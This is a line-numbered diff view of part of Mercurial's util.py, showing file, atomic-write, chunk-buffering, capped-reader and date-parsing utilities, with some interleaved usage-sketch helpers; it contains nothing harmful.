1731 1731 except AttributeError:
1732 1732 return False
1733 1733
1734 1734 def avoidambig(self, path, old):
1735 1735 """Change file stat of specified path to avoid ambiguity
1736 1736
1737 1737 'old' should be previous filestat of 'path'.
1738 1738
1739 1739 Avoiding ambiguity is skipped, and False is returned, if the
1740 1740 process doesn't have appropriate privileges for 'path'.
1742 1742
1743 1743 Otherwise, this returns True, as "ambiguity is avoided".
1744 1744 """
1745 1745 advanced = (old.stat.st_mtime + 1) & 0x7fffffff
1746 1746 try:
1747 1747 os.utime(path, (advanced, advanced))
1748 1748 except OSError as inst:
1749 1749 if inst.errno == errno.EPERM:
1750 1750 # utime() on the file created by another user causes EPERM,
1751 1751 # if a process doesn't have appropriate privileges
1752 1752 return False
1753 1753 raise
1754 1754 return True
1755 1755
1756 1756 def __ne__(self, other):
1757 1757 return not self == other
1758 1758
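# Hedged usage sketch (not part of the original module): the typical
# pattern for detecting and avoiding ambiguous mtimes with filestat.
# 'path' and 'data' are hypothetical; writefile() is defined later in
# this module.
def _filestatdemo(path, data):
    oldstat = filestat.frompath(path)
    writefile(path, data)
    newstat = filestat.frompath(path)
    if newstat.isambig(oldstat):
        # size/ctime/mtime alone cannot tell old and new apart here;
        # nudge mtime forward so later comparisons are unambiguous
        newstat.avoidambig(path, oldstat)
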
1759 1759 class atomictempfile(object):
1760 1760 '''writable file object that atomically updates a file
1761 1761
1762 1762 All writes will go to a temporary copy of the original file. Call
1763 1763 close() when you are done writing, and atomictempfile will rename
1764 1764 the temporary copy to the original name, making the changes
1765 1765 visible. If the object is destroyed without being closed, all your
1766 1766 writes are discarded.
1767 1767
1768 1768 The checkambig argument of the constructor is used with filestat,
1769 1769 and is useful only if the target file is guarded by some lock
1770 1770 (e.g. repo.lock or repo.wlock).
1771 1771 '''
1772 1772 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
1773 1773 self.__name = name # permanent name
1774 1774 self._tempname = mktempcopy(name, emptyok=('w' in mode),
1775 1775 createmode=createmode)
1776 1776 self._fp = posixfile(self._tempname, mode)
1777 1777 self._checkambig = checkambig
1778 1778
1779 1779 # delegated methods
1780 1780 self.read = self._fp.read
1781 1781 self.write = self._fp.write
1782 1782 self.seek = self._fp.seek
1783 1783 self.tell = self._fp.tell
1784 1784 self.fileno = self._fp.fileno
1785 1785
1786 1786 def close(self):
1787 1787 if not self._fp.closed:
1788 1788 self._fp.close()
1789 1789 filename = localpath(self.__name)
1790 1790 oldstat = self._checkambig and filestat.frompath(filename)
1791 1791 if oldstat and oldstat.stat:
1792 1792 rename(self._tempname, filename)
1793 1793 newstat = filestat.frompath(filename)
1794 1794 if newstat.isambig(oldstat):
1795 1795 # stat of changed file is ambiguous to original one
1796 1796 advanced = (oldstat.stat.st_mtime + 1) & 0x7fffffff
1797 1797 os.utime(filename, (advanced, advanced))
1798 1798 else:
1799 1799 rename(self._tempname, filename)
1800 1800
1801 1801 def discard(self):
1802 1802 if not self._fp.closed:
1803 1803 try:
1804 1804 os.unlink(self._tempname)
1805 1805 except OSError:
1806 1806 pass
1807 1807 self._fp.close()
1808 1808
1809 1809 def __del__(self):
1810 1810 if safehasattr(self, '_fp'): # constructor actually did something
1811 1811 self.discard()
1812 1812
1813 1813 def __enter__(self):
1814 1814 return self
1815 1815
1816 1816 def __exit__(self, exctype, excvalue, traceback):
1817 1817 if exctype is not None:
1818 1818 self.discard()
1819 1819 else:
1820 1820 self.close()
1821 1821
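# Illustrative sketch (an assumption, not original code): atomictempfile
# as a context manager. On a normal exit the temporary copy atomically
# replaces the target; on an exception all writes are discarded.
def _atomicwritedemo(path, data):
    with atomictempfile(path, 'wb', checkambig=True) as fp:
        fp.write(data)
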
1822 1822 def unlinkpath(f, ignoremissing=False):
1823 1823 """unlink and remove the directory if it is empty"""
1824 1824 if ignoremissing:
1825 1825 tryunlink(f)
1826 1826 else:
1827 1827 unlink(f)
1828 1828 # try removing directories that might now be empty
1829 1829 try:
1830 1830 removedirs(os.path.dirname(f))
1831 1831 except OSError:
1832 1832 pass
1833 1833
1834 1834 def tryunlink(f):
1835 1835 """Attempt to remove a file, ignoring ENOENT errors."""
1836 1836 try:
1837 1837 unlink(f)
1838 1838 except OSError as e:
1839 1839 if e.errno != errno.ENOENT:
1840 1840 raise
1841 1841
1842 1842 def makedirs(name, mode=None, notindexed=False):
1843 1843 """recursive directory creation with parent mode inheritance
1844 1844
1845 1845 Newly created directories are marked as "not to be indexed by
1846 1846 the content indexing service", if ``notindexed`` is specified
1847 1847 for "write" mode access.
1848 1848 """
1849 1849 try:
1850 1850 makedir(name, notindexed)
1851 1851 except OSError as err:
1852 1852 if err.errno == errno.EEXIST:
1853 1853 return
1854 1854 if err.errno != errno.ENOENT or not name:
1855 1855 raise
1856 1856 parent = os.path.dirname(os.path.abspath(name))
1857 1857 if parent == name:
1858 1858 raise
1859 1859 makedirs(parent, mode, notindexed)
1860 1860 try:
1861 1861 makedir(name, notindexed)
1862 1862 except OSError as err:
1863 1863 # Catch EEXIST to handle races
1864 1864 if err.errno == errno.EEXIST:
1865 1865 return
1866 1866 raise
1867 1867 if mode is not None:
1868 1868 os.chmod(name, mode)
1869 1869
1870 1870 def readfile(path):
1871 1871 with open(path, 'rb') as fp:
1872 1872 return fp.read()
1873 1873
1874 1874 def writefile(path, text):
1875 1875 with open(path, 'wb') as fp:
1876 1876 fp.write(text)
1877 1877
1878 1878 def appendfile(path, text):
1879 1879 with open(path, 'ab') as fp:
1880 1880 fp.write(text)
1881 1881
1882 1882 class chunkbuffer(object):
1883 1883 """Allow arbitrary sized chunks of data to be efficiently read from an
1884 1884 iterator over chunks of arbitrary size."""
1885 1885
1886 1886 def __init__(self, in_iter):
1887 1887 """in_iter is the iterator that's iterating over the input chunks."""
1888 1888 def splitbig(chunks):
1889 1889 for chunk in chunks:
1890 1890 if len(chunk) > 2**20:
1891 1891 pos = 0
1892 1892 while pos < len(chunk):
1893 1893 end = pos + 2 ** 18
1894 1894 yield chunk[pos:end]
1895 1895 pos = end
1896 1896 else:
1897 1897 yield chunk
1898 1898 self.iter = splitbig(in_iter)
1899 1899 self._queue = collections.deque()
1900 1900 self._chunkoffset = 0
1901 1901
1902 1902 def read(self, l=None):
1903 1903 """Read L bytes of data from the iterator of chunks of data.
1904 1904 Returns less than L bytes if the iterator runs dry.
1905 1905
1906 1906 If size parameter is omitted, read everything"""
1907 1907 if l is None:
1908 1908 return ''.join(self.iter)
1909 1909
1910 1910 left = l
1911 1911 buf = []
1912 1912 queue = self._queue
1913 1913 while left > 0:
1914 1914 # refill the queue
1915 1915 if not queue:
1916 1916 target = 2**18
1917 1917 for chunk in self.iter:
1918 1918 queue.append(chunk)
1919 1919 target -= len(chunk)
1920 1920 if target <= 0:
1921 1921 break
1922 1922 if not queue:
1923 1923 break
1924 1924
1925 1925 # The easy way to do this would be to queue.popleft(), modify the
1926 1926 # chunk (if necessary), then queue.appendleft(). However, for cases
1927 1927 # where we read partial chunk content, this incurs 2 dequeue
1928 1928 # mutations and creates a new str for the remaining chunk in the
1929 1929 # queue. Our code below avoids this overhead.
1930 1930
1931 1931 chunk = queue[0]
1932 1932 chunkl = len(chunk)
1933 1933 offset = self._chunkoffset
1934 1934
1935 1935 # Use full chunk.
1936 1936 if offset == 0 and left >= chunkl:
1937 1937 left -= chunkl
1938 1938 queue.popleft()
1939 1939 buf.append(chunk)
1940 1940 # self._chunkoffset remains at 0.
1941 1941 continue
1942 1942
1943 1943 chunkremaining = chunkl - offset
1944 1944
1945 1945 # Use all of unconsumed part of chunk.
1946 1946 if left >= chunkremaining:
1947 1947 left -= chunkremaining
1948 1948 queue.popleft()
1949 1949 # offset == 0 is enabled by block above, so this won't merely
1950 1950 # copy via ``chunk[0:]``.
1951 1951 buf.append(chunk[offset:])
1952 1952 self._chunkoffset = 0
1953 1953
1954 1954 # Partial chunk needed.
1955 1955 else:
1956 1956 buf.append(chunk[offset:offset + left])
1957 1957 self._chunkoffset += left
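# Note: left < chunkremaining in this branch, so the subtraction
# below drives left negative and ends the enclosing while loop.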
1958 1958 left -= chunkremaining
1959 1959
1960 1960 return ''.join(buf)
1961 1961
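# Hypothetical sketch: normalizing an iterator of variably sized chunks
# into fixed-size reads with chunkbuffer. The name and sizes are
# illustrative only.
def _rechunk(chunks, size=4096):
    buf = chunkbuffer(iter(chunks))
    while True:
        data = buf.read(size)
        if not data:
            break
        yield data
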
1962 1962 def filechunkiter(f, size=131072, limit=None):
1963 1963 """Create a generator that produces the data in the file size
1964 1964 (default 131072) bytes at a time, up to optional limit (default is
1965 1965 to read all data). Chunks may be less than size bytes if the
1966 1966 chunk is the last chunk in the file, or the file is a socket or
1967 1967 some other type of file that sometimes reads less data than is
1968 1968 requested."""
1969 1969 assert size >= 0
1970 1970 assert limit is None or limit >= 0
1971 1971 while True:
1972 1972 if limit is None:
1973 1973 nbytes = size
1974 1974 else:
1975 1975 nbytes = min(limit, size)
1976 1976 s = nbytes and f.read(nbytes)
1977 1977 if not s:
1978 1978 break
1979 1979 if limit:
1980 1980 limit -= len(s)
1981 1981 yield s
1982 1982
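# Minimal sketch (an assumed helper, not part of the module): copy at
# most 'limit' bytes between file objects using filechunkiter.
def _copyfilechunks(srcfp, dstfp, limit=None):
    for chunk in filechunkiter(srcfp, size=131072, limit=limit):
        dstfp.write(chunk)
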
1983 class cappedreader(object):
1984 """A file object proxy that allows reading up to N bytes.
1985
1986 Given a source file object, instances of this type allow reading up to
1987 N bytes from that source file object. Attempts to read past the allowed
1988 limit are treated as EOF.
1989
1990 It is assumed that no I/O is performed on the original file object
1991 other than the I/O performed by this instance. If it is, state
1992 tracking will get out of sync and unexpected results will ensue.
1993 """
1994 def __init__(self, fh, limit):
1995 """Allow reading up to <limit> bytes from <fh>."""
1996 self._fh = fh
1997 self._left = limit
1998
1999 def read(self, n=-1):
2000 if not self._left:
2001 return b''
2002
2003 if n < 0:
2004 n = self._left
2005
2006 data = self._fh.read(min(n, self._left))
2007 self._left -= len(data)
2008 assert self._left >= 0
2009
2010 return data
2011
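# Hedged usage sketch for cappedreader: drain a fixed-size frame from a
# stream without trusting the consumer to stop at the boundary. The
# frame-based framing is hypothetical, not an existing protocol here.
def _readframe(fh, framesize):
    reader = cappedreader(fh, framesize)
    chunks = []
    while True:
        chunk = reader.read(2 ** 16)
        if not chunk:
            # either real EOF or the cap was reached
            break
        chunks.append(chunk)
    return b''.join(chunks)
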
1983 2012 def makedate(timestamp=None):
1984 2013 '''Return a unix timestamp (or the current time) as a (unixtime,
1985 2014 offset) tuple based off the local timezone.'''
1986 2015 if timestamp is None:
1987 2016 timestamp = time.time()
1988 2017 if timestamp < 0:
1989 2018 hint = _("check your clock")
1990 2019 raise Abort(_("negative timestamp: %d") % timestamp, hint=hint)
1991 2020 delta = (datetime.datetime.utcfromtimestamp(timestamp) -
1992 2021 datetime.datetime.fromtimestamp(timestamp))
1993 2022 tz = delta.days * 86400 + delta.seconds
1994 2023 return timestamp, tz
1995 2024
1996 2025 def datestr(date=None, format='%a %b %d %H:%M:%S %Y %1%2'):
1997 2026 """represent a (unixtime, offset) tuple as a localized time.
1998 2027 unixtime is seconds since the epoch, and offset is the time zone's
1999 2028 number of seconds away from UTC.
2000 2029
2001 2030 >>> datestr((0, 0))
2002 2031 'Thu Jan 01 00:00:00 1970 +0000'
2003 2032 >>> datestr((42, 0))
2004 2033 'Thu Jan 01 00:00:42 1970 +0000'
2005 2034 >>> datestr((-42, 0))
2006 2035 'Wed Dec 31 23:59:18 1969 +0000'
2007 2036 >>> datestr((0x7fffffff, 0))
2008 2037 'Tue Jan 19 03:14:07 2038 +0000'
2009 2038 >>> datestr((-0x80000000, 0))
2010 2039 'Fri Dec 13 20:45:52 1901 +0000'
2011 2040 """
2012 2041 t, tz = date or makedate()
2013 2042 if "%1" in format or "%2" in format or "%z" in format:
2014 2043 sign = (tz > 0) and "-" or "+"
2015 2044 minutes = abs(tz) // 60
2016 2045 q, r = divmod(minutes, 60)
2017 2046 format = format.replace("%z", "%1%2")
2018 2047 format = format.replace("%1", "%c%02d" % (sign, q))
2019 2048 format = format.replace("%2", "%02d" % r)
2020 2049 d = t - tz
2021 2050 if d > 0x7fffffff:
2022 2051 d = 0x7fffffff
2023 2052 elif d < -0x80000000:
2024 2053 d = -0x80000000
2025 2054 # Never use time.gmtime() and datetime.datetime.fromtimestamp()
2026 2055 # because they use the gmtime() system call which is buggy on Windows
2027 2056 # for negative values.
2028 2057 t = datetime.datetime(1970, 1, 1) + datetime.timedelta(seconds=d)
2029 2058 s = encoding.strtolocal(t.strftime(encoding.strfromlocal(format)))
2030 2059 return s
2031 2060
2032 2061 def shortdate(date=None):
2033 2062 """turn (timestamp, tzoff) tuple into iso 8631 date."""
2034 2063 return datestr(date, format='%Y-%m-%d')
2035 2064
2036 2065 def parsetimezone(s):
2037 2066 """find a trailing timezone, if any, in string, and return a
2038 2067 (offset, remainder) pair"""
2039 2068
2040 2069 if s.endswith("GMT") or s.endswith("UTC"):
2041 2070 return 0, s[:-3].rstrip()
2042 2071
2043 2072 # Unix-style timezones [+-]hhmm
2044 2073 if len(s) >= 5 and s[-5] in "+-" and s[-4:].isdigit():
2045 2074 sign = (s[-5] == "+") and 1 or -1
2046 2075 hours = int(s[-4:-2])
2047 2076 minutes = int(s[-2:])
2048 2077 return -sign * (hours * 60 + minutes) * 60, s[:-5].rstrip()
2049 2078
2050 2079 # ISO8601 trailing Z
2051 2080 if s.endswith("Z") and s[-2:-1].isdigit():
2052 2081 return 0, s[:-1]
2053 2082
2054 2083 # ISO8601-style [+-]hh:mm
2055 2084 if (len(s) >= 6 and s[-6] in "+-" and s[-3] == ":" and
2056 2085 s[-5:-3].isdigit() and s[-2:].isdigit()):
2057 2086 sign = (s[-6] == "+") and 1 or -1
2058 2087 hours = int(s[-5:-3])
2059 2088 minutes = int(s[-2:])
2060 2089 return -sign * (hours * 60 + minutes) * 60, s[:-6]
2061 2090
2062 2091 return None, s
2063 2092
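# Hedged examples of parsetimezone() behavior, derived from the branches
# above (per datestr() below, the offset is the zone's distance from UTC
# in seconds, positive for zones behind UTC):
def _parsetimezonedemo():
    assert parsetimezone('2006-02-01 13:00:30 GMT') == (
        0, '2006-02-01 13:00:30')
    # '-0500' is five hours behind UTC, hence an offset of +18000 seconds
    assert parsetimezone('2006-02-01 13:00:30 -0500') == (
        18000, '2006-02-01 13:00:30')
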
2064 2093 def strdate(string, format, defaults=None):
2065 2094 """parse a localized time string and return a (unixtime, offset) tuple.
2066 2095 if the string cannot be parsed, ValueError is raised."""
2067 2096 if defaults is None:
2068 2097 defaults = {}
2069 2098
2070 2099 # NOTE: unixtime = localunixtime + offset
2071 2100 offset, date = parsetimezone(string)
2072 2101
2073 2102 # add missing elements from defaults
2074 2103 usenow = False # default to using biased defaults
2075 2104 for part in ("S", "M", "HI", "d", "mb", "yY"): # decreasing specificity
2076 2105 part = pycompat.bytestr(part)
2077 2106 found = [True for p in part if ("%"+p) in format]
2078 2107 if not found:
2079 2108 date += "@" + defaults[part][usenow]
2080 2109 format += "@%" + part[0]
2081 2110 else:
2082 2111 # We've found a specific time element, less specific time
2083 2112 # elements are relative to today
2084 2113 usenow = True
2085 2114
2086 2115 timetuple = time.strptime(encoding.strfromlocal(date),
2087 2116 encoding.strfromlocal(format))
2088 2117 localunixtime = int(calendar.timegm(timetuple))
2089 2118 if offset is None:
2090 2119 # local timezone
2091 2120 unixtime = int(time.mktime(timetuple))
2092 2121 offset = unixtime - localunixtime
2093 2122 else:
2094 2123 unixtime = localunixtime + offset
2095 2124 return unixtime, offset
2096 2125
2097 2126 def parsedate(date, formats=None, bias=None):
2098 2127 """parse a localized date/time and return a (unixtime, offset) tuple.
2099 2128
2100 2129 The date may be a "unixtime offset" string or in one of the specified
2101 2130 formats. If the date already is a (unixtime, offset) tuple, it is returned.
2102 2131
2103 2132 >>> parsedate(b' today ') == parsedate(
2104 2133 ... datetime.date.today().strftime('%b %d').encode('ascii'))
2105 2134 True
2106 2135 >>> parsedate(b'yesterday ') == parsedate(
2107 2136 ... (datetime.date.today() - datetime.timedelta(days=1)
2108 2137 ... ).strftime('%b %d').encode('ascii'))
2109 2138 True
2110 2139 >>> now, tz = makedate()
2111 2140 >>> strnow, strtz = parsedate(b'now')
2112 2141 >>> (strnow - now) < 1
2113 2142 True
2114 2143 >>> tz == strtz
2115 2144 True
2116 2145 """
2117 2146 if bias is None:
2118 2147 bias = {}
2119 2148 if not date:
2120 2149 return 0, 0
2121 2150 if isinstance(date, tuple) and len(date) == 2:
2122 2151 return date
2123 2152 if not formats:
2124 2153 formats = defaultdateformats
2125 2154 date = date.strip()
2126 2155
2127 2156 if date == 'now' or date == _('now'):
2128 2157 return makedate()
2129 2158 if date == 'today' or date == _('today'):
2130 2159 date = datetime.date.today().strftime(r'%b %d')
2131 2160 date = encoding.strtolocal(date)
2132 2161 elif date == 'yesterday' or date == _('yesterday'):
2133 2162 date = (datetime.date.today() -
2134 2163 datetime.timedelta(days=1)).strftime(r'%b %d')
2135 2164 date = encoding.strtolocal(date)
2136 2165
2137 2166 try:
2138 2167 when, offset = map(int, date.split(' '))
2139 2168 except ValueError:
2140 2169 # fill out defaults
2141 2170 now = makedate()
2142 2171 defaults = {}
2143 2172 for part in ("d", "mb", "yY", "HI", "M", "S"):
2144 2173 # this piece is for rounding the specific end of unknowns
2145 2174 b = bias.get(part)
2146 2175 if b is None:
2147 2176 if part[0:1] in "HMS":
2148 2177 b = "00"
2149 2178 else:
2150 2179 b = "0"
2151 2180
2152 2181 # this piece is for matching the generic end to today's date
2153 2182 n = datestr(now, "%" + part[0:1])
2154 2183
2155 2184 defaults[part] = (b, n)
2156 2185
2157 2186 for format in formats:
2158 2187 try:
2159 2188 when, offset = strdate(date, format, defaults)
2160 2189 except (ValueError, OverflowError):
2161 2190 pass
2162 2191 else:
2163 2192 break
2164 2193 else:
2165 2194 raise error.ParseError(_('invalid date: %r') % date)
2166 2195 # validate explicit (probably user-specified) date and
2167 2196 # time zone offset. values must fit in signed 32 bits for
2168 2197 # current 32-bit linux runtimes. timezones go from UTC-12
2169 2198 # to UTC+14
2170 2199 if when < -0x80000000 or when > 0x7fffffff:
2171 2200 raise error.ParseError(_('date exceeds 32 bits: %d') % when)
2172 2201 if offset < -50400 or offset > 43200:
2173 2202 raise error.ParseError(_('impossible time zone offset: %d') % offset)
2174 2203 return when, offset
2175 2204
2176 2205 def matchdate(date):
2177 2206 """Return a function that matches a given date match specifier
2178 2207
2179 2208 Formats include:
2180 2209
2181 2210 '{date}' match a given date to the accuracy provided
2182 2211
2183 2212 '<{date}' on or before a given date
2184 2213
2185 2214 '>{date}' on or after a given date
2186 2215
2187 2216 >>> p1 = parsedate(b"10:29:59")
2188 2217 >>> p2 = parsedate(b"10:30:00")
2189 2218 >>> p3 = parsedate(b"10:30:59")
2190 2219 >>> p4 = parsedate(b"10:31:00")
2191 2220 >>> p5 = parsedate(b"Sep 15 10:30:00 1999")
2192 2221 >>> f = matchdate(b"10:30")
2193 2222 >>> f(p1[0])
2194 2223 False
2195 2224 >>> f(p2[0])
2196 2225 True
2197 2226 >>> f(p3[0])
2198 2227 True
2199 2228 >>> f(p4[0])
2200 2229 False
2201 2230 >>> f(p5[0])
2202 2231 False
2203 2232 """
2204 2233
2205 2234 def lower(date):
2206 2235 d = {'mb': "1", 'd': "1"}
2207 2236 return parsedate(date, extendeddateformats, d)[0]
2208 2237
2209 2238 def upper(date):
2210 2239 d = {'mb': "12", 'HI': "23", 'M': "59", 'S': "59"}
2211 2240 for days in ("31", "30", "29"):
2212 2241 try:
2213 2242 d["d"] = days
2214 2243 return parsedate(date, extendeddateformats, d)[0]
2215 2244 except error.ParseError:
2216 2245 pass
2217 2246 d["d"] = "28"
2218 2247 return parsedate(date, extendeddateformats, d)[0]
2219 2248
2220 2249 date = date.strip()
2221 2250
2222 2251 if not date:
2223 2252 raise Abort(_("dates cannot consist entirely of whitespace"))
2224 2253 elif date[0] == "<":
2225 2254 if not date[1:]:
2226 2255 raise Abort(_("invalid day spec, use '<DATE'"))
2227 2256 when = upper(date[1:])
2228 2257 return lambda x: x <= when
2229 2258 elif date[0] == ">":
2230 2259 if not date[1:]:
2231 2260 raise Abort(_("invalid day spec, use '>DATE'"))
2232 2261 when = lower(date[1:])
2233 2262 return lambda x: x >= when
2234 2263 elif date[0] == "-":
2235 2264 try:
2236 2265 days = int(date[1:])
2237 2266 except ValueError:
2238 2267 raise Abort(_("invalid day spec: %s") % date[1:])
2239 2268 if days < 0:
2240 2269 raise Abort(_("%s must be nonnegative (see 'hg help dates')")
2241 2270 % date[1:])
2242 2271 when = makedate()[0] - days * 3600 * 24
2243 2272 return lambda x: x >= when
2244 2273 elif " to " in date:
2245 2274 a, b = date.split(" to ")
2246 2275 start, stop = lower(a), upper(b)
2247 2276 return lambda x: x >= start and x <= stop
2248 2277 else:
2249 2278 start, stop = lower(date), upper(date)
2250 2279 return lambda x: x >= start and x <= stop
2251 2280
2252 2281 def stringmatcher(pattern, casesensitive=True):
2253 2282 """
2254 2283 accepts a string, possibly starting with a 're:' or 'literal:' prefix.
2255 2284 returns the matcher name, pattern, and matcher function.
2256 2285 missing or unknown prefixes are treated as literal matches.
2257 2286
2258 2287 helper for tests:
2259 2288 >>> def test(pattern, *tests):
2260 2289 ... kind, pattern, matcher = stringmatcher(pattern)
2261 2290 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2262 2291 >>> def itest(pattern, *tests):
2263 2292 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2264 2293 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2265 2294
2266 2295 exact matching (no prefix):
2267 2296 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2268 2297 ('literal', 'abcdefg', [False, False, True])
2269 2298
2270 2299 regex matching ('re:' prefix)
2271 2300 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2272 2301 ('re', 'a.+b', [False, False, True])
2273 2302
2274 2303 force exact matches ('literal:' prefix)
2275 2304 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2276 2305 ('literal', 're:foobar', [False, True])
2277 2306
2278 2307 unknown prefixes are ignored and treated as literals
2279 2308 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2280 2309 ('literal', 'foo:bar', [False, False, True])
2281 2310
2282 2311 case insensitive regex matches
2283 2312 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2284 2313 ('re', 'A.+b', [False, False, True])
2285 2314
2286 2315 case insensitive literal matches
2287 2316 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2288 2317 ('literal', 'ABCDEFG', [False, False, True])
2289 2318 """
2290 2319 if pattern.startswith('re:'):
2291 2320 pattern = pattern[3:]
2292 2321 try:
2293 2322 flags = 0
2294 2323 if not casesensitive:
2295 2324 flags = remod.I
2296 2325 regex = remod.compile(pattern, flags)
2297 2326 except remod.error as e:
2298 2327 raise error.ParseError(_('invalid regular expression: %s')
2299 2328 % e)
2300 2329 return 're', pattern, regex.search
2301 2330 elif pattern.startswith('literal:'):
2302 2331 pattern = pattern[8:]
2303 2332
2304 2333 match = pattern.__eq__
2305 2334
2306 2335 if not casesensitive:
2307 2336 ipat = encoding.lower(pattern)
2308 2337 match = lambda s: ipat == encoding.lower(s)
2309 2338 return 'literal', pattern, match
2310 2339
2311 2340 def shortuser(user):
2312 2341 """Return a short representation of a user name or email address."""
2313 2342 f = user.find('@')
2314 2343 if f >= 0:
2315 2344 user = user[:f]
2316 2345 f = user.find('<')
2317 2346 if f >= 0:
2318 2347 user = user[f + 1:]
2319 2348 f = user.find(' ')
2320 2349 if f >= 0:
2321 2350 user = user[:f]
2322 2351 f = user.find('.')
2323 2352 if f >= 0:
2324 2353 user = user[:f]
2325 2354 return user
2326 2355
2327 2356 def emailuser(user):
2328 2357 """Return the user portion of an email address."""
2329 2358 f = user.find('@')
2330 2359 if f >= 0:
2331 2360 user = user[:f]
2332 2361 f = user.find('<')
2333 2362 if f >= 0:
2334 2363 user = user[f + 1:]
2335 2364 return user
2336 2365
2337 2366 def email(author):
2338 2367 '''get email of author.'''
2339 2368 r = author.find('>')
2340 2369 if r == -1:
2341 2370 r = None
2342 2371 return author[author.find('<') + 1:r]
2343 2372
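# Hedged illustration of the three helpers above on a made-up author
# string (the behavior shown is derived from the code, not upstream docs):
def _authordemo():
    author = 'Jane Doe <jane.doe@example.com>'
    assert email(author) == 'jane.doe@example.com'
    assert emailuser('jane.doe@example.com') == 'jane.doe'
    assert shortuser('jane.doe@example.com') == 'jane'
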
2344 2373 def ellipsis(text, maxlength=400):
2345 2374 """Trim string to at most maxlength (default: 400) columns in display."""
2346 2375 return encoding.trim(text, maxlength, ellipsis='...')
2347 2376
2348 2377 def unitcountfn(*unittable):
2349 2378 '''return a function that renders a readable count of some quantity'''
2350 2379
2351 2380 def go(count):
2352 2381 for multiplier, divisor, format in unittable:
2353 2382 if abs(count) >= divisor * multiplier:
2354 2383 return format % (count / float(divisor))
2355 2384 return unittable[-1][2] % count
2356 2385
2357 2386 return go
2358 2387
2359 2388 def processlinerange(fromline, toline):
2360 2389 """Check that linerange <fromline>:<toline> makes sense and return a
2361 2390 0-based range.
2362 2391
2363 2392 >>> processlinerange(10, 20)
2364 2393 (9, 20)
2365 2394 >>> processlinerange(2, 1)
2366 2395 Traceback (most recent call last):
2367 2396 ...
2368 2397 ParseError: line range must be positive
2369 2398 >>> processlinerange(0, 5)
2370 2399 Traceback (most recent call last):
2371 2400 ...
2372 2401 ParseError: fromline must be strictly positive
2373 2402 """
2374 2403 if toline - fromline < 0:
2375 2404 raise error.ParseError(_("line range must be positive"))
2376 2405 if fromline < 1:
2377 2406 raise error.ParseError(_("fromline must be strictly positive"))
2378 2407 return fromline - 1, toline
2379 2408
2380 2409 bytecount = unitcountfn(
2381 2410 (100, 1 << 30, _('%.0f GB')),
2382 2411 (10, 1 << 30, _('%.1f GB')),
2383 2412 (1, 1 << 30, _('%.2f GB')),
2384 2413 (100, 1 << 20, _('%.0f MB')),
2385 2414 (10, 1 << 20, _('%.1f MB')),
2386 2415 (1, 1 << 20, _('%.2f MB')),
2387 2416 (100, 1 << 10, _('%.0f KB')),
2388 2417 (10, 1 << 10, _('%.1f KB')),
2389 2418 (1, 1 << 10, _('%.2f KB')),
2390 2419 (1, 1, _('%.0f bytes')),
2391 2420 )
2392 2421
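# Sketch of bytecount in action (assuming an untranslated locale, since
# the format strings above pass through gettext):
def _bytecountdemo():
    assert bytecount(1) == '1 bytes'
    assert bytecount(2252) == '2.20 KB'
    assert bytecount(6291456) == '6.00 MB'
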
2393 2422 # Matches a single EOL which can either be a CRLF where repeated CR
2394 2423 # are removed or a LF. We do not care about old Macintosh files, so a
2395 2424 # stray CR is an error.
2396 2425 _eolre = remod.compile(br'\r*\n')
2397 2426
2398 2427 def tolf(s):
2399 2428 return _eolre.sub('\n', s)
2400 2429
2401 2430 def tocrlf(s):
2402 2431 return _eolre.sub('\r\n', s)
2403 2432
2404 2433 if pycompat.oslinesep == '\r\n':
2405 2434 tonativeeol = tocrlf
2406 2435 fromnativeeol = tolf
2407 2436 else:
2408 2437 tonativeeol = pycompat.identity
2409 2438 fromnativeeol = pycompat.identity
2410 2439
2411 2440 def escapestr(s):
2412 2441 # call underlying function of s.encode('string_escape') directly for
2413 2442 # Python 3 compatibility
2414 2443 return codecs.escape_encode(s)[0]
2415 2444
2416 2445 def unescapestr(s):
2417 2446 return codecs.escape_decode(s)[0]
2418 2447
2419 2448 def forcebytestr(obj):
2420 2449 """Portably format an arbitrary object (e.g. exception) into a byte
2421 2450 string."""
2422 2451 try:
2423 2452 return pycompat.bytestr(obj)
2424 2453 except UnicodeEncodeError:
2425 2454 # non-ascii string, may be lossy
2426 2455 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2427 2456
2428 2457 def uirepr(s):
2429 2458 # Avoid double backslash in Windows path repr()
2430 2459 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2431 2460
2432 2461 # delay import of textwrap
2433 2462 def MBTextWrapper(**kwargs):
2434 2463 class tw(textwrap.TextWrapper):
2435 2464 """
2436 2465 Extend TextWrapper for width-awareness.
2437 2466
2438 2467 Neither number of 'bytes' in any encoding nor 'characters' is
2439 2468 appropriate to calculate terminal columns for specified string.
2440 2469
2441 2470 Original TextWrapper implementation uses built-in 'len()' directly,
2442 2471 so overriding is needed to use width information of each characters.
2443 2472
2444 2473 In addition, characters classified into 'ambiguous' width are
2445 2474 treated as wide in East Asian area, but as narrow in other.
2446 2475
2447 2476 This requires use decision to determine width of such characters.
2448 2477 """
2449 2478 def _cutdown(self, ucstr, space_left):
2450 2479 l = 0
2451 2480 colwidth = encoding.ucolwidth
2452 2481 for i in xrange(len(ucstr)):
2453 2482 l += colwidth(ucstr[i])
2454 2483 if space_left < l:
2455 2484 return (ucstr[:i], ucstr[i:])
2456 2485 return ucstr, ''
2457 2486
2458 2487 # overriding of base class
2459 2488 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2460 2489 space_left = max(width - cur_len, 1)
2461 2490
2462 2491 if self.break_long_words:
2463 2492 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2464 2493 cur_line.append(cut)
2465 2494 reversed_chunks[-1] = res
2466 2495 elif not cur_line:
2467 2496 cur_line.append(reversed_chunks.pop())
2468 2497
2469 2498 # this overriding code is imported from TextWrapper of Python 2.6
2470 2499 # to calculate columns of string by 'encoding.ucolwidth()'
2471 2500 def _wrap_chunks(self, chunks):
2472 2501 colwidth = encoding.ucolwidth
2473 2502
2474 2503 lines = []
2475 2504 if self.width <= 0:
